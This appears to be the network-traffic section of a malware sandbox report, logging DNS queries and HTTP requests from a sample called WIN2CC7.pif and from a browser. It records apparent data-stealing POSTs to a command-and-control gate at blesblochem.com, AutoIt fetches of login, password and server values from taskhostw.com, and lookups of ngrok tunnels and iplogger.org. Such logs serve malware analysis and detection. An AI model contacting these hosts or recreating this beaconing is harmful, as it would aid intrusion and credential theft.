cdn.broadcom.com

IN CNAME

www.broadcom.com.cdn.cloudflare.net

www.broadcom.com.cdn.cloudflare.net

IN A

104.18.37.111

www.broadcom.com.cdn.cloudflare.net

IN A

172.64.150.145
GET

http://www.symantec.com/

WIN2CC7.pif

Remote address:

104.18.37.111:80

Request

GET / HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: www.symantec.com
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently

Date: Sat, 05 Oct 2024 16:14:31 GMT
Content-Type: text/html
Content-Length: 167
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Sat, 05 Oct 2024 17:14:31 GMT
Location: https://www.symantec.com/
Set-Cookie: __cf_bm=M2o4OPvDgCXOBKZg9jRXhWCK.xNAst2p.YZgvXf.AEs-1728144871-1.0.1.1-Tss4KOWbjFc3jYVN4TD7lRULWjnvnrRN0gyfYQzSGEU5tpwe9xxBAopffTZoHpR_WYnV9mfYC.A3ewoYug7Thg; path=/; expires=Sat, 05-Oct-24 16:44:31 GMT; domain=.www.symantec.com; HttpOnly
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 8cdeb485aae6d0b5-AMS
GET

https://www.symantec.com/

WIN2CC7.pif

Remote address:

104.18.37.111:443

Request

GET / HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Connection: Keep-Alive
Host: www.symantec.com
Cookie: __cf_bm=M2o4OPvDgCXOBKZg9jRXhWCK.xNAst2p.YZgvXf.AEs-1728144871-1.0.1.1-Tss4KOWbjFc3jYVN4TD7lRULWjnvnrRN0gyfYQzSGEU5tpwe9xxBAopffTZoHpR_WYnV9mfYC.A3ewoYug7Thg

Response

HTTP/1.1 301 Moved Permanently

Date: Sat, 05 Oct 2024 16:14:31 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: keep-alive
Location: https://www.broadcom.com/products/cyber-security
CF-Ray: 8cdeb488fb70b944-AMS
CF-Cache-Status: HIT
Access-Control-Allow-Origin: https://avagoresponsecenter.com
Age: 2435
Cache-Control: no-cache, no-store, must-revalidate, proxy-revalidate, max-age=0
Strict-Transport-Security: max-age=31536000; includeSubDomains
Vary: Accept-Encoding
Content-Security-Policy: frame-ancestors 'self' esbroadcom.lookbookhq.com mfbroadcom.lookbookhq.com; script-src 'self' data: blob: https://script.crazyegg.com https://www.google-analytics.com https://www.googletagmanager.com https://cdn.cookielaw.org https://geolocation.onetrust.com https://ajax.googleapis.com https://snap.licdn.com/li.lms-analytics/insight.min.js https://searchunify.com https://searchunify.broadcom.com https://tag.demandbase.com/9a4d64cf696797e4.min.js https://tag.demandbase.com *.adroll.com *.eloqua.com *.en25.com *.bluekai.com *.oraclecloud.com *.brightcove.com *.brightcove.net *.33across.com https://images.sw.broadcom.com https://avagoresponsecenter.com https://kit.fontawesome.com 'nonce-brcm229OD7z5eg5hA1voZew9TQ=='; object-src 'self';
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Permitted-Cross-Domain-Policies: master-only
X-XSS-Protection: 1; mode=block
Server: cloudflare
DNS

www.broadcom.com

WIN2CC7.pif

Remote address:

8.8.8.8:53

Request

www.broadcom.com

IN A

Response

www.broadcom.com

IN CNAME

cdn.broadcom.com

cdn.broadcom.com

IN CNAME

www.broadcom.com.cdn.cloudflare.net

www.broadcom.com.cdn.cloudflare.net

IN A

172.64.150.145

www.broadcom.com.cdn.cloudflare.net

IN A

104.18.37.111
DNS

www.broadcom.com

WIN2CC7.pif

Remote address:

8.8.8.8:53

Request

www.broadcom.com

IN A

Response

www.broadcom.com

IN CNAME

cdn.broadcom.com

cdn.broadcom.com

IN CNAME

www.broadcom.com.cdn.cloudflare.net

www.broadcom.com.cdn.cloudflare.net

IN A

172.64.150.145

www.broadcom.com.cdn.cloudflare.net

IN A

104.18.37.111
GET

https://www.broadcom.com/products/cyber-security

WIN2CC7.pif

Remote address:

172.64.150.145:443

Request

GET /products/cyber-security HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Connection: Keep-Alive
Host: www.broadcom.com

Response

HTTP/1.1 301 Moved Permanently

Date: Sat, 05 Oct 2024 16:14:32 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 57
Connection: keep-alive
Location: /products/cybersecurity
CF-Ray: 8cdeb48c39e2664b-AMS
CF-Cache-Status: HIT
Access-Control-Allow-Origin: https://avagoresponsecenter.com
Age: 145289
Cache-Control: no-cache, no-store, must-revalidate, proxy-revalidate, max-age=0
Last-Modified: Fri, 22 Mar 2024 17:48:58 GMT
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Vary: Accept, Accept-Encoding
bc_locale: en-us
bclang: en-us
Content-Security-Policy: frame-ancestors 'self' esbroadcom.lookbookhq.com mfbroadcom.lookbookhq.com; script-src 'self' data: blob: https://script.crazyegg.com https://www.google-analytics.com https://www.googletagmanager.com https://cdn.cookielaw.org https://geolocation.onetrust.com https://ajax.googleapis.com https://snap.licdn.com/li.lms-analytics/insight.min.js https://searchunify.com https://searchunify.broadcom.com https://tag.demandbase.com/9a4d64cf696797e4.min.js https://tag.demandbase.com *.adroll.com *.eloqua.com *.en25.com *.bluekai.com *.oraclecloud.com *.brightcove.com *.brightcove.net *.33across.com https://images.sw.broadcom.com https://avagoresponsecenter.com https://kit.fontawesome.com 'nonce-brcm229OD7z5eg5hA1voZew9TQ=='; object-src 'self';
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Permitted-Cross-Domain-Policies: master-only
X-XSS-Protection: 1; mode=block
Set-Cookie: __cf_bm=qltdzpFRn0_WZtUK_T60b686UTuqAs9hL1Fg_dQoBaw-1728144872-1.0.1.1-r62MXYaYUl.i4pXFNTzTdgkHNu_DD.J4NzyHllZgoOeNPKDiaUm2ub3p.eBWyuo5eqLUchzp9q4axtDKc1vuDg; path=/; expires=Sat, 05-Oct-24 16:44:32 GMT; domain=.www.broadcom.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
GET

https://www.broadcom.com/products/cybersecurity

WIN2CC7.pif

Remote address:

172.64.150.145:443

Request

GET /products/cybersecurity HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Connection: Keep-Alive
Host: www.broadcom.com
Cookie: __cf_bm=qltdzpFRn0_WZtUK_T60b686UTuqAs9hL1Fg_dQoBaw-1728144872-1.0.1.1-r62MXYaYUl.i4pXFNTzTdgkHNu_DD.J4NzyHllZgoOeNPKDiaUm2ub3p.eBWyuo5eqLUchzp9q4axtDKc1vuDg

Response

HTTP/1.1 200 OK

Date: Sat, 05 Oct 2024 16:14:32 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Ray: 8cdeb48d4b06664b-AMS
CF-Cache-Status: HIT
Access-Control-Allow-Origin: https://avagoresponsecenter.com
Age: 48438
Cache-Control: no-cache, no-store, must-revalidate, proxy-revalidate, max-age=0
Last-Modified: Thu, 03 Oct 2024 02:28:23 GMT
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Vary: Accept-Encoding
bc_locale: en-us
bclang: en-us
cf-nonce-generator: HIT
content-security-policy: frame-ancestors 'self' esbroadcom.lookbookhq.com mfbroadcom.lookbookhq.com; script-src 'self' data: blob: https://script.crazyegg.com https://www.google-analytics.com https://www.googletagmanager.com https://cdn.cookielaw.org https://geolocation.onetrust.com https://ajax.googleapis.com https://snap.licdn.com/li.lms-analytics/insight.min.js https://searchunify.com https://searchunify.broadcom.com https://tag.demandbase.com/9a4d64cf696797e4.min.js https://tag.demandbase.com *.adroll.com *.eloqua.com *.en25.com *.bluekai.com *.oraclecloud.com *.brightcove.com *.brightcove.net *.33across.com https://images.sw.broadcom.com https://avagoresponsecenter.com https://kit.fontawesome.com 'nonce-MjVkYzI5NjUyNA/OWFiYzg0NDkxYWFiOWY='; object-src 'self';
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-permitted-cross-domain-policies: master-only
x-xss-protection: 1; mode=block
Server: cloudflare
Content-Encoding: gzip
DNS

openssl.org

WIN2CC7.pif

Remote address:

8.8.8.8:53

Request

openssl.org

IN MX

Response

openssl.org

IN MX

alt2aspmxlgooglecom

openssl.org

IN MX

alt3�0

openssl.org

IN MX

alt4�0

openssl.org

IN MX

�0

openssl.org

IN MX

alt1�0
DNS

alt2.aspmx.l.google.com

WIN2CC7.pif

Remote address:

8.8.8.8:53

Request

alt2.aspmx.l.google.com

IN A

Response

alt2.aspmx.l.google.com

IN A

142.250.150.27
DNS

alt2.aspmx.l.google.com

WIN2CC7.pif

Remote address:

8.8.8.8:53

Request

alt2.aspmx.l.google.com

IN A

Response

alt2.aspmx.l.google.com

IN A

142.250.150.27
DNS

boglogov.site

Remote address:

8.8.8.8:53

Request

boglogov.site

IN A

Response
DNS

boglogov.site

Remote address:

8.8.8.8:53

Request

boglogov.site

IN A

Response
DNS

boglogov.site

Remote address:

8.8.8.8:53

Request

boglogov.site

IN A

Response
DNS

boglogov.site

Remote address:

8.8.8.8:53

Request

boglogov.site

IN A

Response
DNS

0.tcp.ngrok.io

Remote address:

8.8.8.8:53

Request

0.tcp.ngrok.io

IN A

Response

0.tcp.ngrok.io

IN A

18.190.63.84
DNS

0.tcp.ngrok.io

Remote address:

8.8.8.8:53

Request

0.tcp.ngrok.io

IN A

Response

0.tcp.ngrok.io

IN A

18.190.63.84
DNS

taskhostw.com

Remote address:

8.8.8.8:53

Request

taskhostw.com

IN A

Response

taskhostw.com

IN A

152.89.218.85
DNS

taskhostw.com

Remote address:

8.8.8.8:53

Request

taskhostw.com

IN A

Response

taskhostw.com

IN A

152.89.218.85
GET

http://taskhostw.com/L.html

Remote address:

152.89.218.85:80

Request

GET /L.html HTTP/1.1
User-Agent: AutoIt
Host: taskhostw.com
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 05 Oct 2024 16:15:41 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Wed, 25 Jan 2023 21:20:29 GMT
ETag: "7-5f31d33a2e870"
Accept-Ranges: bytes
Content-Length: 7
Content-Type: text/html
DNS

rms-server.tektonit.ru

Remote address:

8.8.8.8:53

Request

rms-server.tektonit.ru

IN A

Response

rms-server.tektonit.ru

IN CNAME

main.internetid.ru

main.internetid.ru

IN A

95.213.205.83
DNS

rms-server.tektonit.ru

Remote address:

8.8.8.8:53

Request

rms-server.tektonit.ru

IN A

Response

rms-server.tektonit.ru

IN CNAME

main.internetid.ru

main.internetid.ru

IN A

95.213.205.83
DNS

google.com

Remote address:

8.8.8.8:53

Request

google.com

IN MX

Response

google.com

IN MX

smtp�
DNS

smtp.google.com

Remote address:

8.8.8.8:53

Request

smtp.google.com

IN A

Response

smtp.google.com

IN A

142.250.27.26

smtp.google.com

IN A

142.250.102.26

smtp.google.com

IN A

142.250.102.27

smtp.google.com

IN A

142.250.27.27
DNS

smtp.google.com

Remote address:

8.8.8.8:53

Request

smtp.google.com

IN A

Response

smtp.google.com

IN A

142.250.27.27

smtp.google.com

IN A

142.250.102.27

smtp.google.com

IN A

142.250.27.26

smtp.google.com

IN A

142.250.102.26
DNS

iplogger.org

Remote address:

8.8.8.8:53

Request

iplogger.org

IN A

Response

iplogger.org

IN A

172.67.74.161

iplogger.org

IN A

104.26.3.46

iplogger.org

IN A

104.26.2.46
DNS

iplogger.org

Remote address:

8.8.8.8:53

Request

iplogger.org

IN A

Response

iplogger.org

IN A

172.67.74.161

iplogger.org

IN A

104.26.3.46

iplogger.org

IN A

104.26.2.46
DNS

blesblochem.com

Remote address:

8.8.8.8:53

Request

blesblochem.com

IN A

Response

blesblochem.com

IN A

18.208.156.248
POST

http://blesblochem.com/two/gates1/fre.php

Remote address:

18.208.156.248:80

Request

POST /two/gates1/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: blesblochem.com
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 210DDB56
Content-Length: 358
Connection: close

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 05 Oct 2024 16:15:49 GMT
Content-Type: text/html
Connection: close
Set-Cookie: btst=2582260fba9b6cd15651fee294956093|192.42.116.199|1728144949|1728144949|0|1|0; path=/; domain=.blesblochem.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=192.42.116.199; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://blesblochem.com/two/gates1/fre.php

Remote address:

18.208.156.248:80

Request

POST /two/gates1/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: blesblochem.com
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 210DDB56
Content-Length: 180
Connection: close

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 05 Oct 2024 16:15:50 GMT
Content-Type: text/html
Connection: close
Set-Cookie: btst=4189666a4bbf2bdb62b30448e37f8dae|192.42.116.199|1728144950|1728144950|0|1|0; path=/; domain=.blesblochem.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=192.42.116.199; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://blesblochem.com/two/gates1/fre.php

Remote address:

18.208.156.248:80

Request

POST /two/gates1/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: blesblochem.com
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 210DDB56
Content-Length: 153
Connection: close

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 05 Oct 2024 16:15:51 GMT
Content-Type: text/html
Connection: close
Set-Cookie: btst=06be17150a2b48efa6de27401d4855e3|192.42.116.199|1728144951|1728144951|0|1|0; path=/; domain=.blesblochem.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=192.42.116.199; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

0.tcp.ngrok.io

Remote address:

8.8.8.8:53

Request

0.tcp.ngrok.io

IN A

Response

0.tcp.ngrok.io

IN A

3.12.245.36
DNS

0.tcp.ngrok.io

Remote address:

8.8.8.8:53

Request

0.tcp.ngrok.io

IN A

Response

0.tcp.ngrok.io

IN A

3.135.250.11
DNS

izenpe.com

Remote address:

8.8.8.8:53

Request

izenpe.com

IN MX

Response

izenpe.com

IN MX

aspmxlgoogle�

izenpe.com

IN MX

alt2�*

izenpe.com

IN MX

aspmx3 googlemail�

izenpe.com

IN MX

alt1�*

izenpe.com

IN MX

aspmx2�e
DNS

aspmx.l.google.com

Remote address:

8.8.8.8:53

Request

aspmx.l.google.com

IN A

Response

aspmx.l.google.com

IN A

142.250.102.27
DNS

aspmx.l.google.com

Remote address:

8.8.8.8:53

Request

aspmx.l.google.com

IN A

Response

aspmx.l.google.com

IN A

142.250.27.26
DNS

middlechrist.com

Remote address:

8.8.8.8:53

Request

middlechrist.com

IN A

Response

middlechrist.com

IN A

66.96.162.135
DNS

middlechrist.com

Remote address:

8.8.8.8:53

Request

middlechrist.com

IN A

Response

middlechrist.com

IN A

66.96.162.135
GET

http://taskhostw.com/randomink/STATUS.html

Remote address:

152.89.218.85:80

Request

GET /randomink/STATUS.html HTTP/1.1
User-Agent: AutoIt
Host: taskhostw.com
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 05 Oct 2024 16:15:58 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Mon, 25 Sep 2023 13:40:42 GMT
ETag: "6-6062f1ac52821"
Accept-Ranges: bytes
Content-Length: 6
Content-Type: text/html
GET

http://taskhostw.com/randomink/loaderTOP.html

Remote address:

152.89.218.85:80

Request

GET /randomink/loaderTOP.html HTTP/1.1
User-Agent: AutoIt
Host: taskhostw.com
Cache-Control: no-cache

Response

HTTP/1.1 404 Not Found

Date: Sat, 05 Oct 2024 16:16:00 GMT
Server: Apache/2.4.25 (Debian)
Content-Length: 275
Content-Type: text/html; charset=iso-8859-1
GET

http://taskhostw.com/randomink/Login.html

Remote address:

152.89.218.85:80

Request

GET /randomink/Login.html HTTP/1.1
User-Agent: AutoIt
Host: taskhostw.com
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 05 Oct 2024 16:16:00 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Mon, 25 Sep 2023 13:40:42 GMT
ETag: "4-6062f1abd776c"
Accept-Ranges: bytes
Content-Length: 4
Content-Type: text/html
GET

http://taskhostw.com/randomink/Password.html

Remote address:

152.89.218.85:80

Request

GET /randomink/Password.html HTTP/1.1
User-Agent: AutoIt
Host: taskhostw.com
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 05 Oct 2024 16:16:01 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Mon, 25 Sep 2023 13:40:42 GMT
ETag: "c-6062f1abecf2a"
Accept-Ranges: bytes
Content-Length: 12
Content-Type: text/html
GET

http://taskhostw.com/randomink/Server.html

Remote address:

152.89.218.85:80

Request

GET /randomink/Server.html HTTP/1.1
User-Agent: AutoIt
Host: taskhostw.com
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 05 Oct 2024 16:16:02 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Mon, 25 Sep 2023 13:40:42 GMT
ETag: "e-6062f1ac372a4"
Accept-Ranges: bytes
Content-Length: 14
Content-Type: text/html
GET

http://middlechrist.com/html/license_43EC922A3D0E1F403834ED436BA90C5A686E606FE2C68C471F4CE42C93524A733C47010287CE9159E8D69FE5469C45CA6C2FF8970E4D13204AFCE98A1C5A9C2924CF3F64589D6F483DBE74DEAC659155AFACD072A8A8C9A60753446BBC05BCE0834533DE29D58BC16F58EC50AF1B8F1CFA3507B15E8135AAC7171CE5F96FA84746E92323F61458717D6B468CF2B1FB6A5A1BDBC2824E342C7F0901FEF80DADE0F16E3771C2656C3CDDEB426276894549F790D3AA834E44D67548DA87C8F6160E738FDEC08856AAFD42B6CD19D74FD2ACF5AB278A644BEC1557A268610430E05B10945B8AD7B62A8379B43CCC086589BA07A85C692738F1940782BCBBDB8D029020409D436270C4E7D0A305D7FB980BB976EEF3E7A87794BDA541C65C9BAF239D9BCD129BC39E175F9CB4F7201FC8BDC1EB43CEE805A16896A9EBE67968E16D5710ECA15C385C08D07C2098879C326E3DB0A9E53C98F6A9E77E119B183EF935DD36B5D008B4A2282D18C8FBC18F41708F0372692D405D.html

Remote address:

66.96.162.135:80

Request

GET /html/license_43EC922A3D0E1F403834ED436BA90C5A686E606FE2C68C471F4CE42C93524A733C47010287CE9159E8D69FE5469C45CA6C2FF8970E4D13204AFCE98A1C5A9C2924CF3F64589D6F483DBE74DEAC659155AFACD072A8A8C9A60753446BBC05BCE0834533DE29D58BC16F58EC50AF1B8F1CFA3507B15E8135AAC7171CE5F96FA84746E92323F61458717D6B468CF2B1FB6A5A1BDBC2824E342C7F0901FEF80DADE0F16E3771C2656C3CDDEB426276894549F790D3AA834E44D67548DA87C8F6160E738FDEC08856AAFD42B6CD19D74FD2ACF5AB278A644BEC1557A268610430E05B10945B8AD7B62A8379B43CCC086589BA07A85C692738F1940782BCBBDB8D029020409D436270C4E7D0A305D7FB980BB976EEF3E7A87794BDA541C65C9BAF239D9BCD129BC39E175F9CB4F7201FC8BDC1EB43CEE805A16896A9EBE67968E16D5710ECA15C385C08D07C2098879C326E3DB0A9E53C98F6A9E77E119B183EF935DD36B5D008B4A2282D18C8FBC18F41708F0372692D405D.html HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 8.0; Windows NT 6.0; en-US)
Host: middlechrist.com
Cache-Control: no-cache

Response

HTTP/1.1 406 Not Acceptable

Date: Sat, 05 Oct 2024 16:16:08 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 1017
Connection: keep-alive
Server: Apache
Age: 0
GET

http://middlechrist.com/html/license_43EC922A3D0E1F403834ED436BA90C5A686E606FE2C68C471F4CE42C93524A733C47010287CE9159E8D69FE5469C45CA6C2FF8970E4D13204AFCE98A1C5A9C2924CF3F64589D6F483DBE74DEAC659155AFACD072A8A8C9A60753446BBC05BCE0834533DE29D58BC16F58EC50AF1B8F1CFA3507B15E8135AAC7171CE5F96FA84746E92323F61458717D6B468CF2B1FB6A5A1BDBC2824E342C7F0901FEF80DADE0F16E3771C2656C3CDDEB426276894549F790D3AA834E44D67548DA87C8F6160E738FDEC08856AAFD42B6CD19D74FD2ACF5AB278A644BEC1557A268610430E05B10945B8AD7B62A8379B43CCC086589BA07A85C692738F1940782BCBBDB8D029020409D436270C4E7D0A305D7FB980BB976EEF3E7A87794BDA541C65C9BAF239D9BCD129BC39E175F9CB4F7201FC8BDC1EB43CEE805A16896A9EBE67968E16D5710ECA15C385C08D07C2098879C326E3DB0A9E53C98F6A9E77E119B183EF935DD36B5D008B4A2282D18C8FBC18F41708F0372692D405D50FA3A59B02A906FB3FCBD885A70E6D1C07B8C3C085CB0AF7F520CAB3D4DA58D0F2AA0401DF0B6A4CA6C589C87B4B16F6C2B8795151CDC5A2108C98F853355C94986C9CEBC1726E014C2CDC2336CD9ABF970DC23FB1D62C47B905CD14B6FB5C0C1C557BB00F6096100E09F679D148FE74345E20B8A3178823D646E04D704EAE3B43CFCF21643597BCD59.html

Remote address:

66.96.162.135:80

Request

GET /html/license_43EC922A3D0E1F403834ED436BA90C5A686E606FE2C68C471F4CE42C93524A733C47010287CE9159E8D69FE5469C45CA6C2FF8970E4D13204AFCE98A1C5A9C2924CF3F64589D6F483DBE74DEAC659155AFACD072A8A8C9A60753446BBC05BCE0834533DE29D58BC16F58EC50AF1B8F1CFA3507B15E8135AAC7171CE5F96FA84746E92323F61458717D6B468CF2B1FB6A5A1BDBC2824E342C7F0901FEF80DADE0F16E3771C2656C3CDDEB426276894549F790D3AA834E44D67548DA87C8F6160E738FDEC08856AAFD42B6CD19D74FD2ACF5AB278A644BEC1557A268610430E05B10945B8AD7B62A8379B43CCC086589BA07A85C692738F1940782BCBBDB8D029020409D436270C4E7D0A305D7FB980BB976EEF3E7A87794BDA541C65C9BAF239D9BCD129BC39E175F9CB4F7201FC8BDC1EB43CEE805A16896A9EBE67968E16D5710ECA15C385C08D07C2098879C326E3DB0A9E53C98F6A9E77E119B183EF935DD36B5D008B4A2282D18C8FBC18F41708F0372692D405D50FA3A59B02A906FB3FCBD885A70E6D1C07B8C3C085CB0AF7F520CAB3D4DA58D0F2AA0401DF0B6A4CA6C589C87B4B16F6C2B8795151CDC5A2108C98F853355C94986C9CEBC1726E014C2CDC2336CD9ABF970DC23FB1D62C47B905CD14B6FB5C0C1C557BB00F6096100E09F679D148FE74345E20B8A3178823D646E04D704EAE3B43CFCF21643597BCD59.html HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 8.0; Windows NT 6.0; en-US)
Host: middlechrist.com
Cache-Control: no-cache

Response

HTTP/1.1 406 Not Acceptable

Date: Sat, 05 Oct 2024 16:16:09 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 1293
Connection: keep-alive
Server: Apache
Age: 1
DNS

bemachin.com

Remote address:

8.8.8.8:53

Request

bemachin.com

IN A

Response
DNS

0.tcp.ngrok.io

Remote address:

8.8.8.8:53

Request

0.tcp.ngrok.io

IN A

Response

0.tcp.ngrok.io

IN A

3.12.245.36

104.18.30.95:443

https://bloxflip.com/a/kriszti

tls, http

msedge.exe

1.7kB
10.1kB
10
14

HTTP Request

GET https://bloxflip.com/a/kriszti

HTTP Response

403
104.18.30.95:443

https://bloxflip.com/cdn-cgi/styles/cf.errors.css

tls, http

msedge.exe

1.7kB
6.2kB
9
11

HTTP Request

GET https://bloxflip.com/cdn-cgi/styles/cf.errors.css

HTTP Response

200
104.18.30.95:443

https://bloxflip.com/cdn-cgi/challenge-platform/h/g/jsd/r/8cdea388b8df569a

tls, http2

msedge.exe

18.6kB
28.7kB
61
68

HTTP Request

GET https://bloxflip.com/cdn-cgi/images/browser-bar.png?1376755637

HTTP Request

GET https://bloxflip.com/cdn-cgi/images/cf-no-screenshot-error.png

HTTP Request

GET https://bloxflip.com/cdn-cgi/challenge-platform/scripts/jsd/main.js

HTTP Response

200

HTTP Response

200

HTTP Response

302

HTTP Request

GET https://bloxflip.com/cdn-cgi/challenge-platform/h/g/scripts/jsd/ec4b873d446c/main.js?

HTTP Request

GET https://bloxflip.com/favicon.ico

HTTP Response

200

HTTP Response

403

HTTP Request

POST https://bloxflip.com/cdn-cgi/challenge-platform/h/g/jsd/r/8cdea388b8df569a

HTTP Response

200
104.18.30.95:443

bloxflip.com

tls

msedge.exe

737 B
132 B
4
3
104.18.30.95:443

bloxflip.com

tls

msedge.exe

701 B
132 B
4
3
92.123.128.135:443

https://www.bing.com/qbox?query=pp&language=en-US&pt=EdgBox&cvid=02bcc1d54a1b47799c7d1093d1646595&ig=827a2eb50abb498f83409a54f5ce619b&oit=1&cp=2&pgcl=4

tls, http

msedge.exe

1.5kB
4.4kB
8
9

HTTP Request

GET https://www.bing.com/qbox?query=pp&language=en-US&pt=EdgBox&cvid=02bcc1d54a1b47799c7d1093d1646595&ig=827a2eb50abb498f83409a54f5ce619b&oit=1&cp=2&pgcl=4
92.123.128.135:443

https://www.bing.com/qbox?query=ppornh&language=en-US&pt=EdgBox&cvid=02bcc1d54a1b47799c7d1093d1646595&ig=3da66ae652e445b1816ca6e1a6fe289c&oit=1&cp=6&pgcl=4

tls, http

msedge.exe

1.5kB
4.4kB
8
9

HTTP Request

GET https://www.bing.com/qbox?query=ppornh&language=en-US&pt=EdgBox&cvid=02bcc1d54a1b47799c7d1093d1646595&ig=3da66ae652e445b1816ca6e1a6fe289c&oit=1&cp=6&pgcl=4
92.123.128.135:443

https://www.bing.com/qbox?query=ppornhu&language=en-US&pt=EdgBox&cvid=02bcc1d54a1b47799c7d1093d1646595&ig=f7c79edc0b77498fb19538d8b85f76e8&oit=1&cp=7&pgcl=4

tls, http

msedge.exe

1.5kB
5.0kB
8
10

HTTP Request

GET https://www.bing.com/qbox?query=ppornhu&language=en-US&pt=EdgBox&cvid=02bcc1d54a1b47799c7d1093d1646595&ig=f7c79edc0b77498fb19538d8b85f76e8&oit=1&cp=7&pgcl=4
92.123.128.135:443

https://www.bing.com/qbox?query=por&language=en-US&pt=EdgBox&cvid=b918b912aea0447dac6c3f982135f63c&ig=e244ed960967462cbcfcb893d04e7e3c&oit=1&cp=3&pgcl=4

tls, http

msedge.exe

5.9kB
23.6kB
28
36

HTTP Request

GET https://www.bing.com/qbox?query=ppornhub&language=en-US&pt=EdgBox&cvid=02bcc1d54a1b47799c7d1093d1646595&ig=7efacfc75e21463d9d03684359e73928&oit=1&cp=8&pgcl=4

HTTP Response

200

HTTP Request

GET https://www.bing.com/qbox?query=ppornhub.&language=en-US&pt=EdgBox&cvid=02bcc1d54a1b47799c7d1093d1646595&ig=193fa52e2e8d4de087c3ff515f11a259&oit=1&cp=9&pgcl=4

HTTP Response

200

HTTP Request

GET https://www.bing.com/qbox?query=ppornhub.c&language=en-US&pt=EdgBox&cvid=02bcc1d54a1b47799c7d1093d1646595&ig=b7f85f2a85e548deb498e088c17e8fd9&oit=1&cp=10&pgcl=4

HTTP Response

200

HTTP Request

GET https://www.bing.com/qbox?query=ppornhub.co&language=en-US&pt=EdgBox&cvid=02bcc1d54a1b47799c7d1093d1646595&ig=61b72370268f4dcebca06b44f5341c06&oit=3&cp=11&pgcl=4

HTTP Response

200

HTTP Request

GET https://www.bing.com/qbox?query=ppornhub.com&language=en-US&pt=EdgBox&cvid=02bcc1d54a1b47799c7d1093d1646595&ig=4b2e0898202645459f02eb5dbf589ea4&oit=3&cp=12&pgcl=4

HTTP Response

200

HTTP Request

GET https://www.bing.com/qbox?query=p&language=en-US&pt=EdgBox&cvid=b918b912aea0447dac6c3f982135f63c&ig=50e3f341f71b4c1dbc9711feeccfcd4d&oit=1&cp=1&pgcl=4

HTTP Response

200

HTTP Request

GET https://www.bing.com/qbox?query=po&language=en-US&pt=EdgBox&cvid=b918b912aea0447dac6c3f982135f63c&ig=b62567e2f5ed4cf68b148c0479257a6c&oit=1&cp=2&pgcl=4

HTTP Response

200

HTTP Request

GET https://www.bing.com/qbox?query=por&language=en-US&pt=EdgBox&cvid=b918b912aea0447dac6c3f982135f63c&ig=e244ed960967462cbcfcb893d04e7e3c&oit=1&cp=3&pgcl=4
92.123.128.135:443

www.bing.com

tls

msedge.exe

1.2kB
5.3kB
14
15
92.123.128.135:443

www.bing.com

tls

msedge.exe

1.2kB
5.3kB
14
15
92.123.128.135:443

www.bing.com

tls

msedge.exe

1.2kB
5.3kB
14
15
66.254.114.210:80

http://ppornhub.com/

http

msedge.exe

1.7kB
1.7kB
27
26

HTTP Request

